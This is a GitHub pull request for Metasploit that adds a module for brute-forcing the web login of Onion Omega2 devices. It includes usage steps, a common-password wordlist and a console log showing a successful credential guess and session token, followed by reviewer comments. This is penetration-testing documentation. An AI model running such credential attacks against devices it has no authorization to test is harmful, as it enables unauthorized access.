Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add http login scanner for Onion Omega2 devices #11661

Merged
merged 3 commits into from May 21, 2019

Conversation

Projects
None yet
5 participants
@nsa
Copy link
Contributor

commented Mar 30, 2019

The onion_omega2_login module is used to brute-force credentials for Onion Omage2 devices.

Vulnerable Application

  • Onion Omage2 HTTPd Service

Onion Omega2

Onion Omega2 OnionOS Web Page

Verification Steps

  1. Plug your Onion Omega2 device to a power source.
    • First time setup can be found here
  2. Connect its Wi-Fi network.
  3. Start msfconsole
  4. Do: use auxiliary/scanner/http/onion_omega2_login
  5. Do: set RHOSTS 192.168.3.1
  6. Do: set USERPASS_FILE <user pass dictionary>
    • username and password seperated by space and one pair per line.
  7. Do: run

Sample userpass file:

root 123456
root password
root 123456789
root 12345678
root 12345
root 10601
root qwerty
root 123123
root 111111
root abc123
root 1234567
root dragon
root 1q2w3e4r
root sunshine
root 654321
root master

Scenario

msf5 > use auxiliary/scanner/http/onion_omega2_login
msf5 auxiliary(scanner/http/onion_omega2_login) > set RHOSTS 192.168.3.1
RHOSTS => 192.168.3.1
msf5 auxiliary(scanner/http/onion_omega2_login) > set USERPASS_FILE something.txt
USERPASS_FILE => something.txt
msf5 auxiliary(scanner/http/onion_omega2_login) > run

[*] Running for 192.168.3.1...
[*] 192.168.3.1:80 - [ 1/16] - root:123456 - Failure
[!] No active DB -- Credential data will not be saved!
[*] 192.168.3.1:80 - [ 2/16] - root:password - Failure
[*] 192.168.3.1:80 - [ 3/16] - root:123456789 - Failure
[*] 192.168.3.1:80 - [ 4/16] - root:12345678 - Failure
[*] 192.168.3.1:80 - [ 5/16] - root:12345 - Failure
[+] Ubus RPC Session: 403e133730879d23a2a0df022e19c19c
[+] 192.168.3.1:80 - [ 6/16] - root:10601 - Success
[*] 192.168.3.1:80 - [ 7/16] - root:qwerty - Failure
[*] 192.168.3.1:80 - [ 8/16] - root:123123 - Failure
[*] 192.168.3.1:80 - [ 9/16] - root:111111 - Failure
[*] 192.168.3.1:80 - [10/16] - root:abc123 - Failure
[*] 192.168.3.1:80 - [11/16] - root:1234567 - Failure
[*] 192.168.3.1:80 - [12/16] - root:dragon - Failure
[*] 192.168.3.1:80 - [13/16] - root:1q2w3e4r - Failure
[*] 192.168.3.1:80 - [14/16] - root:sunshine - Failure
[*] 192.168.3.1:80 - [15/16] - root:654321 - Failure
[*] 192.168.3.1:80 - [16/16] - root:master - Failure
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

nsa added some commits Mar 30, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

commented Apr 2, 2019

It looks like this is: https://onion.io/store/omega2-starter-bundle/
Just want to confirm before anyone buys the wrong hardware to test it. I didn't see an option to run the OS in a VM, is that correct?

@nsa

This comment has been minimized.

Copy link
Contributor Author

commented Apr 2, 2019

Yes, the device is correct.

The Operating system

The Omega2 runs the Linux Embedded Development Environment (LEDE) operating system, a distribution based on OpenWRT

A quote from the docs

Since it's a custom embedded OS I don't think that there is a VM for it. The login page is accessible through Omega2's Wi-Fi network.

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 25, 2019

Please send a PCAP of the module running to msfdev [at] metasploit.com.

@jrobles-r7 jrobles-r7 added the docs label Apr 25, 2019

Apply suggestions from code review
Co-Authored-By: nsa <mustafa@calap.co>
@nsa

This comment has been minimized.

Copy link
Contributor Author

commented Apr 30, 2019

@jrobles-r7 The PCAP file is sent.

@jrobles-r7 jrobles-r7 merged commit cf6c57c into rapid7:master May 21, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request May 21, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented May 21, 2019

Apologies for the delay. Thanks for sending the PCAP over and contributing.

msjenkins-r7 added a commit that referenced this pull request May 21, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented May 21, 2019

Release Notes

The onion_omega2_login auxiliary module performs login brute-forcing of Onion Omega2 devices.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.